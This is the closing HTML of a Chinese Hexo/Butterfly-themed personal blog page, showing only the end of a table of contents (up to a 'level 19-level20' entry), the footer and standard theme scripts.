18</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#level-19-level20"><span class="toc-number">20.</span> <span class="toc-text">level 19-level20</span></a></li></ol></div></div></div></div></main><footer id="footer" style="background-image: url(/img/footer.png);"><div id="footer-wrap"><div class="copyright">&copy;2019 - 2024 By echozt</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="日间和夜间模式切换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside-config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><div class="js-pjax"></div><script defer="defer" id="ribbon" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/canvas-ribbon.min.js" size="150" alpha="0.6" zIndex="-1" mobile="false" data-click="false"></script><script id="click-show-text" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/click-show-text.min.js" data-mobile="false" data-text="富强,民主,文明,和谐,自由,平等,公正,法治,爱国,敬业,诚信,友善" data-fontsize="15px" data-random="false" async="async"></script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>